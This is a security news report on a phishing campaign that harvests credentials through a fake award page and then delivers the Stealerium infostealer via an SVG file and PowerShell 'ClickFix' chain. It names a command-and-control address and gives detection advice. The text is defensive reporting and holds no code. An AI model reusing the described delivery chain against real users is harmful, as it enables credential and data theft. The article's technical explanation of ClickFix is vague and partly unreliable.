A new and dangerous phishing campaign is targeting organizations with a deceptive “Executive Award” theme that combines social engineering with advanced malware delivery.
This two-stage attack first tricks users into sharing their login credentials through a fake HTML form, then deploys the Stealerium information stealer to compromise affected systems.
The campaign represents a growing trend where attackers combine credential theft with malware infections in a single, coordinated operation.
The attack begins with a polished HTML phishing page titled “Virtual-Gift-Card-Claim.html” that mimics a legitimate corporate award notification.
Users who interact with this page believe they are verifying their account credentials to claim an executive award, but instead, their login information is immediately sent to a Telegram command-and-control server controlled by the attackers.
.webp "Beware of the New 'Executive Award' Campaign That Uses ClickFix to Deliver Stealerium Malware 2")
This credential harvesting phase serves as the first stage of the infection chain.
SpiderLabs security analysts identified the malware after analyzing the campaign’s infrastructure and attack patterns.
The researchers discovered that once a user falls for the phishing page, a malicious SVG file named “account-verification-form.svg” is delivered in the second stage.
This file triggers a sophisticated PowerShell script that operates through the ClickFix exploit chain, a known technique that abuses Windows messaging systems to execute hidden commands.
The PowerShell code then downloads and installs the Stealerium infostealer on the victim’s computer without the user’s knowledge or consent.
Stealerium represents a serious threat because it operates silently to extract sensitive information from infected systems.
The malware communicates with command-and-control servers at 31.57.147.77:6464 and uses multiple download endpoints to retrieve additional components and commands.
This architecture allows attackers to adapt their attack in real time based on system conditions and security measures already in place.
Understanding the Infection Mechanism and PowerShell Execution
The attack’s strength lies in how it uses legitimate Windows features against users. When the malicious SVG file opens, the embedded PowerShell commands execute with minimal visibility.
The ClickFix chain abuses legitimate Windows messaging protocols to trigger the execution without raising typical security alerts.
From there, Stealerium downloads additional components, including the main DLL file, batch scripts, and command executables.
The malware then establishes persistence, ensuring it survives system restarts and continues stealing data. Organizations should monitor for unusual PowerShell activity, suspicious SVG file execution, and network connections to the identified command-and-control infrastructure at 31.57.147.77:6464.
Endpoint detection systems should be configured to flag attempts to execute PowerShell commands from non-standard sources.
Network monitoring should block access to the known malicious IP addresses and watch for DNS requests associated with this campaign.
Users should remain vigilant about unsolicited emails claiming executive recognition or award notifications, as these remain effective social engineering vectors.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
